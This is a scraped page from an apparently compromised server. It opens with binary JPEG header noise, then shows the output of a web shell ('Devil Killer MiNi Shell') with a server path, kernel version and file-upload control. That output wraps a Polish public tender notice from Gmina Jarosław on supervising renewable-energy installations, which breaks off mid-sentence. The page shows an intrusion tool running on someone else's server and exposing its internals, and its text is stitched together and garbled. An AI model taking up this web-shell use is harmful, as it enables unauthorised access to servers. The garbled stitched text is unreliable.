JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221014/0039429801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sprawowanie nadzoru inwestorskiego nad realizacją zadania <br/>„Instalacja odnawialnych źródeł energii w gospodarstwach domowych dla mieszkańców Gminy Jarosław i Gminy Roźwienica” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jarosław</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900482</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piekarska 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">16 624 86 10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@ug.jaroslaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.jaroslaw.samorzad.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprawowanie nadzoru inwestorskiego nad realizacją zadania <br/>„Instalacja odnawialnych źródeł energii w gospodarstwach domowych dla mieszkańców Gminy Jarosław i Gminy Roźwienica” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-828ec291-4bf8-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00394298</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016995/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Sprawowanie nadzoru inwestorskiego nad realizacją zadania „Instalacja odnawialnych źródeł energii w gospodarstwach domowych dla mieszkańców Gminy Jarosław i Gminy Roźwienica”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie dofinansowane ze środków Instrumentu REACT-EU w ramach działania 11.2 Rozwój OZE – REACT-EU, Osi priorytetowej nr III Czysta Energia, Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020, umowa o dofinansowanie Projektu nr RPPK.11.02.00-18-0004/21-00. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-828ec291-4bf8-11ed-9171-f6b7c7d59353 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/jaroslaw</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">19.1.	Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>19.2.	Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego <br/>w pkt 15 i 16 SWZ - zgodne ze wzorem stanowiącym załącznik nr 2 do SWZ (art. 125 ust. 1 ustawy Pzp). Oświadczenie to stanowi dowód potwierdzający brak podstaw <br/>do wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym <br/>a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy dostępnej na stronie profilu nabywcy https://platformazakupowa.pl/pn/jaroslaw. <br/>Zgodnie z § 11 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. <br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu <br/>o udzielenie zamówienia publicznego lub konkursie oraz zgodnie z art. 67 ustawy p.z.p., Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6)	Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego <br/>z zegarem Głównego Urzędu Miar.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi <br/>w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu <br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzenie Ministra Rozwoju, Pracy I Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415) .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">30.1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>30.1.1.	Administratorem Pani/Pana danych osobowych jest: Wójt Gminy Jarosław, <br/>ul. Piekarska 5, 37-500 Jarosław.<br/>30.1.2.	Administrator wyznaczył Inspektora Ochrony Danych (IOD). Kontakt <br/>z Inspektorem Ochrony Danych - iod@jaroslaw.itl.pl, telefonicznie pod numerem: 16 624 86 33, listownie na adres Urzędu Gminy Jarosław, kontakt osobisty w siedzibie Urzędu<br/>30.1.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 <br/>lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: Sprawowanie nadzoru inwestorskiego nad realizacją zadania „Instalacja odnawialnych źródeł energii w gospodarstwach domowych dla mieszkańców Gminy Jarosław i Gminy Roźwienica”.<br/>30.1.4.	prowadzonym w trybie podstawowym bez negocjacji. <br/>30.1.5.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu ustawę Pzp, <br/>30.1.6.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego,<br/>30.1.7.	Niezależnie od postanowień ppkt 30.1.5. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego,<br/>30.1.8.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/>30.1.9.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>30.1.10.	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>30.1.11.	Nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>30.1.12.	Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub <br/>w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UG.271.19.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sprawowanie nadzoru inwestorskiego nad realizacją zadania „Instalacja odnawialnych źródeł energii w gospodarstwach domowych dla mieszkańców Gminy Jarosław i Gminy Roźwienica”<br/>Nadzór pełniony będzie nad robotami budowlanymi pełnego zakresu robót zgodnie <br/>z dokumentacją, która określa zakres i sposób wykonania robót, dostępna na stronie internetowej Zamawiającego pod linkami: <br/>https://platformazakupowa.pl/transakcja/635469.<br/><br/>Przedmiot zamówienia obejmuje pełnienie nadzoru na czterema udzielonymi zamówieniami:<br/>Część 1: Dostawa i montaż instalacji fotowoltaicznych dla prywatnych budynków mieszkalnych<br/>– łącznie 373 kpl instalacji, w tym: 199 kpl instalacji dla Gminy Jarosław oraz 174 kpl instalacji dla Gminy Roźwienica.<br/>Następujące typy instalacji fotowoltaicznych, w zależności od ich mocy, w ilościach:<br/>Instalacje fotowoltaiczne funkcjonalnie powiązane z budynkiem mieszkalnym <br/>o powierzchni użytkowej do 300 m2:<br/>Zestaw 1: panele fotowoltaiczne o łącznej mocy min. 2,80 kW - 5 szt. <br/>Zestaw 2: panele fotowoltaiczne o łącznej mocy min. 3,20 kW - 36 szt. <br/>Zestaw 3: panele fotowoltaiczne o łącznej mocy min. 3,60 kW - 4 szt.<br/>Zestaw 4: panele fotowoltaiczne o łącznej mocy min. 4,00 kW - 172 szt.<br/>Zestaw 5: panele fotowoltaiczne o łącznej mocy min. 4,40 kW - 2 szt.<br/>Zestaw 6: panele fotowoltaiczne o łącznej mocy min. 4,80 kW - 48 szt.<br/>Zestaw 7: panele fotowoltaiczne o łącznej mocy min. 5,20 kW - 36 szt.<br/>Zestaw 8: panele fotowoltaiczne o łącznej mocy min. 5,60 kW -2 szt.<br/>Zestaw 9: panele fotowoltaiczne o łącznej mocy min. 6,00 kW - 26 szt.<br/>Zestaw 10: panele fotowoltaiczne o łącznej mocy min. 6,40 kW -2 szt.<br/>Zestaw 11: panele fotowoltaiczne o łącznej mocy min. 6,80 kW - 3 szt.<br/>Zestaw 12: panele fotowoltaiczne o łącznej mocy min. 7,20 kW - 13 szt.<br/>Zestaw 13: panele fotowoltaiczne o łącznej mocy min. 8,00 kW - 9 szt.<br/>Zestaw 14: panele fotowoltaiczne o łącznej mocy min. 9,20 kW - 3 szt.<br/>Zestaw 15: panele fotowoltaiczne o łącznej mocy min. 9,60 kW - 12 szt.<br/>Zadanie dofinansowane ze środków Instrumentu REACT-EU w ramach działania 11.2 Rozwój OZE – REACT-EU, Osi priorytetowej nr III Czysta Energia, Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020, umowa o dofinansowanie Projektu nr RPPK.11.02.00-18-0004/21-00.	<br/>Zgodnie z art. 310 ustawy Pzp Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia, nie zostały mu przyznane.<br/><br/>Wykonawca(y) zobowiązany będzie zawrzeć odrębne umowy dla Gminy Jarosław i dla Gminy Roźwienica na świadczenie usług nadzoru oddzielnie dla każdego z zadań częściowych.<br/><br/>12.2. Pozostałe warunki dotyczące realizacji zamówienia określone zostały w projektowanych postanowieniach umowy - załącznik nr 7 do SWZ <br/><br/>12.3. Wymagania (obowiązki) stawiane Wykonawcy, opisane zostały w projektowanych postanowieniach umowy stanowiących - załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1.	CENA	80 %<br/>2.	ILOŚĆ POBYTÓW NA TERENIE WYKONYWANIA ZAMÓWIENIA	20 %<br/>	Razem	100 %<br/><br/>24.2. Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej. <br/><br/>KRYTERIUM CENA - 80 % (C).<br/>Maksymalną ilość punktów w kryterium „Cena” otrzyma oferta z najniższą ceną. Ilość punktów <br/>przyznana ofercie w kryterium „Cena” zostanie określona zgodnie ze wzorem: <br/> <br/> Cena oferty najtańszej <br/>C = ------------------------------------------- × Kp × Wc <br/> Cena oferty badanej <br/><br/>gdzie: <br/>C – liczba punktów przyznana ocenianej ofercie w kryterium cena, <br/>Kp – współczynnik proporcjonalności = 100, <br/>Wc – waga procentowa dla kryterium „Cena” = 80 %.<br/><br/>KRYTERIUM ILOŚĆ POBYTÓW INSPEKTORA NADZORU NA TERENIE WYKONYWANIA ZAMÓWIENIA - 20 % (I).<br/>Ocena ofert w kryterium „ilość wizyt inspektora nadzoru na budowie” zostanie dokonana na podstawie informacji wskazanej przez Wykonawcę w Formularzu ofertowym według poniższych zasad.<br/>Zamawiający zgodnie z pkt 12.3.2. ppkt 1 lit. b SWZ wymaga pobytu inspektora nadzoru lub inspektorów nadzoru (w przypadku, gdy zadanie częściowe w ramach niniejszego postępowania stawia warunek udziału obydwu inspektorów nadzoru) na terenie wykonywania zamówienia minimum 1 raz na 5 dni roboczych, licząc od dnia następnego po rozpoczęciu montażu przez Wykonawców zamówień, każdy potwierdzony wpisem do dziennika prowadzonego przez przedstawicieli zamawiającego. <br/>Zgodnie z deklaracją Wykonawcy zawartą w Formularzu ofertowym, Zamawiający przyzna ofercie poniżej przedstawioną ilość punktów: <br/>1)	2 pobyty w ciągu 5 dni roboczych – 5 pkt,<br/>2)	3 pobyty w ciągu 5 dni roboczych – 10 pkt,<br/>3)	4 pobyty w ciągu 5 dni roboczych – 15 pkt,<br/>4)	codzienny pobyt - 20 pkt.<br/><br/>W przypadku braku informacji w ofercie Wykonawcy, w zakresie oznaczenia ilości wizyt inspektora nadzoru na budowie, Zamawiający przyjmie, iż Wykonawca spełnia warunek minimalny (1 pobyt na tydzień). <br/><br/>24.4.1. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą sumę punktów według wzoru: <br/><br/>C + I = S <br/>gdzie:<br/>S – suma punktów przyznana ofercie,<br/>C - ilość punktów przyznanych ofercie w kryterium cena,<br/>I – ilość punktów przyznanych ofercie w kryterium ilość wizyt inspektora nadzoru na budowie.<br/><br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ILOŚĆ POBYTÓW NA TERENIE WYKONYWANIA ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sprawowanie nadzoru inwestorskiego nad realizacją zadania „Instalacja odnawialnych źródeł energii w gospodarstwach domowych dla mieszkańców Gminy Jarosław i Gminy Roźwienica”<br/>Nadzór pełniony będzie nad robotami budowlanymi pełnego zakresu robót zgodnie <br/>z dokumentacją, która określa zakres i sposób wykonania robót, dostępna na stronie internetowej Zamawiającego pod linkami: <br/>https://platformazakupowa.pl/transakcja/635469.<br/>Część 2: Dostawa i montaż instalacji kolektorów słonecznych dla prywatnych budynków mieszkalnych – łącznie 151 kpl instalacji, w tym: w tym: 91 kpl instalacji dla Gminy Jarosław oraz 60 kpl instalacji dla Gminy Roźwienica.<br/>Następujące zestawy instalacji, w ilościach:<br/>Instalacje kolektorów słonecznych zlokalizowane na/w budynku mieszkalnym o powierzchni użytkowej do 300 m2:<br/>Zestaw 16: 2 kolektory słoneczne płaskie z podgrzewaczem pojemnościowym ciepłej wody użytkowej - 26 szt.<br/>Zestaw 17: 3 kolektory słoneczne płaskie z podgrzewaczem pojemnościowym ciepłej wody użytkowej – 94 szt.<br/>Zestaw 18: 4 kolektory słoneczne płaskie z podgrzewaczem pojemnościowym ciepłej wody użytkowej – 16 szt.<br/>Instalacje kolektorów słonecznych zlokalizowane poza budynkiem mieszkalnym:<br/>Zestaw 19: 2 kolektory słoneczne 